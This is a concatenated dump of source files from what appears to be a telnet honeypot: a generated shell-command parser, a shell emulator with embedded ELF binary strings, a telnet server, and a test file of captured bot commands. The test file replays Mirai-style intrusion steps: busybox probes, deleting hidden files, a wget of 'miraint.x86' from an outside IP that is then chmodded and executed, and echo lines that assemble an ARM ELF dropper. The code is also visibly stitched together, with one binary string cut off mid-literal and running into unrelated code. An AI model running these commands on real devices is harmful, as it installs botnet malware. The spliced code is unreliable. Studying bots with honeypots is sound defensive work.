self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '\'': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"\'"') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 is not None and Grammar.REGEX_1.search(chunk1): address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address3 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^\']') if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) address4 = FAILURE chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 1] if chunk2 == '\'': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('"\'"') if address4 is not FAILURE: elements0.append(address4) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_arg_quot(self._input, index1, 
self._offset, elements0) self._offset = self._offset self._cache['arg_quot1'][index0] = (address0, self._offset) return address0 def _read_arg_quot2(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_quot2'].get(index0) if cached: self._offset = cached[1] return cached[0] index1, elements0 = self._offset, [] address1 = FAILURE chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 == '"': address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('\'"\'') if address1 is not FAILURE: elements0.append(address1) address2 = FAILURE remaining0, index2, elements1, address3 = 0, self._offset, [], True while address3 is not FAILURE: chunk1 = None if self._offset < self._input_size: chunk1 = self._input[self._offset:self._offset + 1] if chunk1 is not None and Grammar.REGEX_2.search(chunk1): address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address3 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^"]') if address3 is not FAILURE: elements1.append(address3) remaining0 -= 1 if remaining0 <= 0: address2 = TreeNode(self._input[index2:self._offset], index2, elements1) self._offset = self._offset else: address2 = FAILURE if address2 is not FAILURE: elements0.append(address2) address4 = FAILURE chunk2 = None if self._offset < self._input_size: chunk2 = self._input[self._offset:self._offset + 1] if chunk2 == '"': address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address4 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if 
self._offset == self._failure: self._expected.append('\'"\'') if address4 is not FAILURE: elements0.append(address4) else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 else: elements0 = None self._offset = index1 if elements0 is None: address0 = FAILURE else: address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0) self._offset = self._offset self._cache['arg_quot2'][index0] = (address0, self._offset) return address0 def _read_arg_noquot(self): address0, index0 = FAILURE, self._offset cached = self._cache['arg_noquot'].get(index0) if cached: self._offset = cached[1] return cached[0] remaining0, index1, elements0, address1 = 1, self._offset, [], True while address1 is not FAILURE: chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 1] if chunk0 is not None and Grammar.REGEX_3.search(chunk0): address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset) self._offset = self._offset + 1 else: address1 = FAILURE if self._offset > self._failure: self._failure = self._offset self._expected = [] if self._offset == self._failure: self._expected.append('[^ ;|&()"\'><]') if address1 is not FAILURE: elements0.append(address1) remaining0 -= 1 if remaining0 <= 0: address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0) self._offset = self._offset else: address0 = FAILURE self._cache['arg_noquot'][index0] = (address0, self._offset) return address0 def _read_empty(self): address0, index0 = FAILURE, self._offset cached = self._cache['empty'].get(index0) if cached: self._offset = cached[1] return cached[0] index1 = self._offset chunk0 = None if self._offset < self._input_size: chunk0 = self._input[self._offset:self._offset + 0] if chunk0 == '': address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset) self._offset = self._offset + 0 else: address0 = FAILURE if self._offset > self._failure: self._failure = 
self._offset
                self._expected = []
            if self._offset == self._failure:
                self._expected.append('""')
        if address0 is FAILURE:
            # "empty" always succeeds: fall back to a zero-width node.
            address0 = TreeNode(self._input[index1:index1], index1)
            self._offset = index1
        self._cache['empty'][index0] = (address0, self._offset)
        return address0

    def _read_sep(self):
        # sep <- " "*  (optional run of spaces; always succeeds).
        address0, index0 = FAILURE, self._offset
        cached = self._cache['sep'].get(index0)
        if cached:
            self._offset = cached[1]
            return cached[0]
        remaining0, index1, elements0, address1 = 0, self._offset, [], True
        while address1 is not FAILURE:
            chunk0 = None
            if self._offset < self._input_size:
                chunk0 = self._input[self._offset:self._offset + 1]
            if chunk0 == ' ':
                address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
                self._offset = self._offset + 1
            else:
                address1 = FAILURE
                # Record furthest failure for the error message.
                if self._offset > self._failure:
                    self._failure = self._offset
                    self._expected = []
                if self._offset == self._failure:
                    self._expected.append('" "')
            if address1 is not FAILURE:
                elements0.append(address1)
                remaining0 -= 1
        # remaining0 starts at 0, so the repetition can match zero spaces.
        if remaining0 <= 0:
            address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
            self._offset = self._offset
        else:
            address0 = FAILURE
        self._cache['sep'][index0] = (address0, self._offset)
        return address0


class Parser(Grammar):
    # Public entry point around the generated Grammar rules.
    # "actions" supplies the make_* callbacks that build the command AST;
    # "types" is the optional node-type mixin mechanism (unused here).
    def __init__(self, input, actions, types):
        self._input = input
        self._input_size = len(input)
        self._actions = actions
        self._types = types
        self._offset = 0
        self._cache = defaultdict(dict)   # per-rule packrat memo tables
        self._failure = 0                 # furthest failing offset seen
        self._expected = []               # tokens expected at that offset
    def parse(self):
        # Succeeds only if the top rule consumed the ENTIRE input.
        tree = self._read_cmd()
        if tree is not FAILURE and self._offset == self._input_size:
            return tree
        if not self._expected:
            self._failure = self._offset
            # NOTE(review): canopy normally appends '<EOF>' here; the empty
            # string looks like an extraction artifact (tag stripped) —
            # verify against freshly regenerated grammar.py.
            self._expected.append('')
        raise ParseError(format_error(self._input, self._failure, self._expected))


def format_error(input, offset, expected):
    # Build a human-readable "Line N: expected ..." message with a caret
    # pointing at the failing column.
    lines, line_no, position = input.split('\n'), 0, 0
    while position <= offset:
        position += len(lines[line_no]) + 1
        line_no += 1
    message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n' position -= len(line) + 1 message += ' ' * (offset - position) return message + '^' def parse(input, actions=None, types=None): parser = Parser(input, actions, types) return parser.parse() ================================================ FILE: honeypot/shell/shell.py ================================================ import sys import traceback from grammar import parse, TreeNode from commands.base import Proc def filter_ascii(string): string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in " ") return string ### ELF_BIN_ARM = "\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00(\x00\x01\x00\x00\x00h\xc2\x00\x004\x00\x00\x00X^\x01\x00\x02\x00\x00\x054\x00 \x00\x08\x00(\x00\x1c\x00\x1b\x00\x01\x00\x00p\xc0X\x01\x00\xc0\xd8\x01\x00\xc0\xd8\x01\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x004\x00\x00\x004\x80\x00\x004\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x004\x01\x00\x004\x81\x00\x004\x81\x00\x00\x13\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\xdcX\x01\x00\xdcX\x01\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xdcX\x01\x00\xdcX\x02\x00\xdcX\x02\x00\x1c\x04\x00\x00\xbc\x10\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x02\x00\x00\x00\xe8X\x01\x00\xe8X\x02\x00\xe8X\x02\x00\x08\x01\x00\x00\x08\x01\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00H\x01\x00\x00H\x81\x00\x00H\x81\x00\x00D\x00\x00\x00D\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00Q\xe5td\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00/lib/ld-linux.so.3\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x1b\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00\x02Tz0\x80\x94\xc2\x8e%\xf1\xa4\xad\xc7D\xa9\x91q\x94\xdb\na\x00\x00\x00\x06\x00\x0
0\x00 \x00\x00\x00\n\x00\x00\x00\x00I\x10\x92\x02D\x1b&@\x10@\xe0B\x00`\x00\x91AA\x10\x00r\x11\x11aH\x14(\x00\x00\x00\x00\x08\x00\x00\x80\x90\t\x00 \x08\x00*\x00@\x00$\xad\x11\x10\x81,(\x00\x00\t@J!\x91\x19\xadA\x04\x80IE\x85\x85\xf0\x88\xb3h\x80\x02H\x08\x80\x80\x00\x08\x01(d\x0e!M\xe0\xa8D\x94\x02 \x00\x08\x01\x87)\x00\x08\n\x00J\x08\x0e\x01\xc0-\x00 @\x18\x80d\xe6 \x81\x02\x00\x89\n\x90\x00$\x0e\x8c\xb0(\x06\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x19\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00%\x00\x00\x00\x00\x00\x00\x00'\x00\x00\x00)\x00\x00\x00\x00\x00\x00\x00*\x00\x00\x00,\x00\x00\x000\x00\x00\x002\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00?\x00\x00\x00A\x00\x00\x00G\x00\x00\x00I\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00N\x00\x00\x00R\x00\x00\x00S\x00\x00\x00T\x00\x00\x00U\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00Y\x00\x00\x00Z\x00\x00\x00\\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00c\x00\x00\x00d\x00\x00\x00f\x00\x00\x00h\x00\x00\x00i\x00\x00\x00k\x00\x00\x00n\x00\x00\x00q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00\x00\x00\x00\x00\x00\x00u\x00\x00\x00v\x00\x00\x00y\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00{\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00~\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x08,\xae\xff_\x96\x93\x1c\x03}\x1eL\xa3Z\xef\x90V\xdb\x93\x1c\xa8vbICw)\x91,2@\xfd\xda\x80A\xb7\xed\xe9C+\xf1\x81B\x84\xcf\x18L\x0fvT<\x94\xca\x96\x93\x1c\xcd?\x0c\xaf\x88j\x06\xaf\x8dm\x94\x0
6\x08~\x92\x1c!t\xb0\x02\xe2\xad\xc6\x1b.N=\xf6\xdb\xf7\x00^\x01\xaf4\xe8_t;\xc5" ELF_BIN_X86 = "\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00>\x00\x01\x00\x00\x00P\x1c\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xb8\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\t\x00@\x00\x1c\x00\x1b\x00\x06\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x008\x02\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x98m\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x90\x04\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00X|\x00\x00\x00\x00\x00\x00X| \x00\x00\x00\x00\x00X| 
\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00T\x02\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00D\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00P\xe5td\x04\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00d`\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00D\x02\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00Q\xe5td\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00R\xe5td\x04\x00\x00\x00\xf0{\x00\x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\xf0{ \x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00/lib64/ld-linux-x86-64.so.2\x00\x04\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00GNU\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x14\x00\x00\x00\x03\x00\x00\x00GNU\x00Y\xde\xf0\x1bLK": c.redirect_to(filename) elif operator == ">>": c.redirect_app(filename) elif operator == "<": c.redirect_from(filename) else: print "WARNING: unsupported redirect operator " + operator return c def make_cmdbrac(self, input, start, end, elements): return elements[2] def make_args(self, input, start, end, elements): if isinstance(elements[0], basestring): r = [ elements[0] ] else: r = [] for arg in elements[1].elements: if isinstance(arg.elements[1], basestring): r.append(arg.elements[1]) c = Command(r) return c def run(string, env): c = parse(filter_ascii(string).strip(), actions=Actions()) return c.run(env) def test_shell(): env = Env() while True: sys.stdout.write(" # ") sys.stdout.flush() line = sys.stdin.readline() if line == "": break if line == "\n": continue line = line[:-1] tree = run(line, env) sys.stdout.flush() 
================================================ FILE: honeypot/shell/test.sh ================================================ #!/bin/bash canopy grammar.peg --lang python && python shell.py < test.txt ================================================ FILE: honeypot/shell/test.txt ================================================ cp ls cat dd rm echo busybox sh cd true false chmod uname : ps enable shell sh /bin/busybox ECCHI /bin/busybox ps; /bin/busybox ECCHI /bin/busybox cat /proc/mounts; /bin/busybox ECCHI /bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon /bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/. 
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon /bin/busybox ECCHI rm /proc/.t; rm /proc/.sh; rm /proc/.human rm /sys/.t; rm /sys/.sh; rm /sys/.human rm /tmp/.t; rm /tmp/.sh; rm /tmp/.human rm /overlay/.t; rm /overlay/.sh; rm /overlay/.human rm /.t; rm /.sh; rm /.human rm /dev/.t; rm /dev/.sh; rm /dev/.human rm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human rm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human rm /dev/.t; rm /dev/.sh; rm /dev/.human cd /proc/ /bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI /bin/busybox cat /bin/echo /bin/busybox ECCHI /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI /bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI ./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE rm -rf upnp; > dvrpelper; /bin/busybox ECCHI cat /proc/mounts; (/bin/busybox DFYHE || :) echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s echo -ne 
"\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x68\xab\xb1\x67\xe2\xc5\x41\x26\x00\x00\x00\x61\x65\x61" >> .s echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s cat .s /bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp; ================================================ FILE: honeypot/telnet.py ================================================ import struct import socket import traceback import time from thread import start_new_thread from session import Session from util.dbg import dbg from util.config import config class IPFilter: def __init__(self): self.map = {} self.timeout = config.get("telnet_ip_min_time_between_connections") def add_ip(self, ip): self.map[ip] = time.time() def is_allowed(self, ip): self.clean() return 
not(ip in self.map) def clean(self): todelete = [] for ip in self.map: if self.map[ip] + self.timeout < time.time(): todelete.append(ip) for ip in todelete: del self.map[ip] class Telnetd: cmds = {} cmds[240] = "SE - subnegoation end" cmds[241] = "NOP - no operation" cmds[242] = "DM - data mark" cmds[243] = "BRK - break" cmds[244] = "IP - interrupt process" cmds[245] = "AO - abort output" cmds[246] = "AYT - are you there" cmds[247] = "EC - erase char" cmds[248] = "EL - erase line" cmds[249] = "GA - go ahead" cmds[250] = "SB - subnegotiation" cmds[251] = "WILL - positive return" cmds[252] = "WONT - negative return" cmds[253] = "DO - set option" cmds[254] = "DONT - unset option" cmds[255] = "IAC - interpret as command" SE = 240 NOP = 241 DM = 242 BRK = 243 IP = 244 AO = 245 AYT = 246 EC = 247 EL = 248 GA = 249 SB = 250 WILL = 251 WONT = 252 DO = 253 DONT = 254 IAC = 255 # Options NAWS = 31 def __init__(self, addr, port): self.host = addr self.port = port self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.do_run = True self.ipfilter = IPFilter() def run(self): self.sock.bind((self.host, self.port)) self.sock.listen(10) self.sock.settimeout(None) dbg("Socket open on " + str(self.host) + ":" + str(self.port)) while self.do_run: try: self.handle() except: traceback.print_exc() self.sock.close() dbg("Socket Closed") def handle(self): conn = False try: conn, addr = self.sock.accept() dbg("Client connected at " + str(addr)) if self.ipfilter.is_allowed(addr[0]): self.ipfilter.add_ip(addr[0]) sess = TelnetSess(self, conn, addr) start_new_thread(sess.loop, ()) else: dbg("Connection limit for " + addr[0] + " exceeded, closing") conn.close() except: traceback.print_exc() def stop(self): self.do_run = False class TelnetSess: def __init__(self, serv, sock, remote): self.serv = serv self.sock = sock self.timeout = config.get("telnet_session_timeout") self.maxtime = config.get("telnet_max_session_length") self.db_id = 0 self.remote = remote self.session = None def 
loop(self): self.session = Session(self.send_string, self.remote[0]) dbg("Setting timeout to " + str(self.timeout) + " seconds") self.sock.settimeout(self.timeout) try: self.test_opt(1) # Kill of Session if longer than self.maxtime ts_start = int(time.time()) self.send_string("Login: ") u = self.recv_line() self.send_string("Password: ") p = self.recv_line() self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n") self.session.login(u, p) while True: l = self.recv_line() try: self.session.shell(l) except: traceback.print_exc() self.send_string("sh: error\r\n") if ts_start + self.maxtime < int(time.time()): dbg("Session too long. Killing off.") break except socket.timeout: dbg("Connection timed out") except EOFError: dbg("Connection closed") self.session.end() self.sock.close() def test_naws(self): #dbg("TEST NAWS") if self.test_opt(Telnetd.NAWS): self.need(Telnetd.IAC) self.need(Telnetd.SB) self.need(Telnetd.NAWS) w = self.recv_short() h = self.recv_short() self.need(Telnetd.IAC) self.need(Telnetd.SE) #dbg("TEST NAWS OK " + str(w) + "x" + str(h)) elif byte == Telnetd.WONT: pass #dgb("TEST NAWS FAILED") else: raise ValueError() def test_linemode(self): #dbg("TEST LINEMODE") if self.test_opt(34): self.need(Telnetd.IAC) self.need(Telnetd.SE) def test_opt(self, opt, do=True): #dbg("TEST " + str(opt)) self.send(Telnetd.IAC) if do: self.send(Telnetd.DO) else: self.send(Telnetd.DONT) self.send(opt) def send(self, byte): #if byte in Telnetd.cmds: # dbg("SEND " + str(Telnetd.cmds[byte])) #else: # dbg("SEND " + str(byte)) self.sock.send(chr(byte)) def send_string(self, msg): self.sock.send(msg) #dbg("SEND STRING LEN" + str(len(msg))) def recv(self): byte = self.sock.recv(1) if len(byte) == 0: raise EOFError byte = ord(byte) #if byte in Telnetd.cmds: # dbg("RECV " + str(Telnetd.cmds[byte])) #else: # dbg("RECV " + str(byte)) return byte def recv_line(self): line = "" while True: byte = self.recv() if byte == Telnetd.IAC: byte = self.recv() self.process_cmd(byte) elif 
byte == ord("\r"): pass elif byte == ord("\n"): break else: line = line + chr(byte) #dbg("RECV STRING " + line) return line def recv_short(self): bytes = self.sock.recv(2) short = struct.unpack("!H", bytes)[0] #dbg("RECV SHORT " + str(short)) return short def need(self, byte_need): byte = ord(self.sock.recv(1)) #if byte in Telnetd.cmds: # dbg("RECV " + str(Telnetd.cmds[byte])) #else: # dbg("RECV " + str(byte)) if byte != byte_need: dbg("BAD " + "PROTOCOL ERROR. EXIT.") raise ValueError() return byte def process_cmd(self, cmd): if cmd == Telnetd.DO: byte = self.recv() self.send(Telnetd.IAC) self.send(Telnetd.WONT) self.send(byte) if cmd == Telnetd.WILL or cmd == Telnetd.WONT: byte = self.recv() ================================================ FILE: honeypot.py ================================================ import os import sys import signal import json import socket from honeypot.telnet import Telnetd from honeypot.client import Client from honeypot.session import Session from honeypot.shell.shell import test_shell from util.dbg import dbg from util.config import config srv = None def import_file(fname): with open(fname, "rb") as fp: client = Client() for line in fp: line = line.strip() obj = json.loads(line) if obj["type"] == "connection": if obj["ip"] != None: print "conn " + obj["ip"] client.put_session(obj) if obj["type"] == "sample": print "sample " + obj["sha256"] client.put_sample_info(obj) def rerun_file(fname): with open(fname, "rb") as fp: for line in fp: line = line.strip() obj = json.loads(line) if obj["type"] == "connection": if obj["ip"] == None: continue session = Session(sys.stdout.write, obj["ip"]) session.login(obj["user"], obj["pass"]) for event in obj["stream"]: if not(event["in"]): continue sys.stdout.write(event["data"]) session.shell(event["data"].strip()) session.end() def signal_handler(signal, frame): dbg('Ctrl+C') srv.stop() if not os.path.exists("samples"): os.makedirs("samples") if __name__ == "__main__": action = None configFile = 
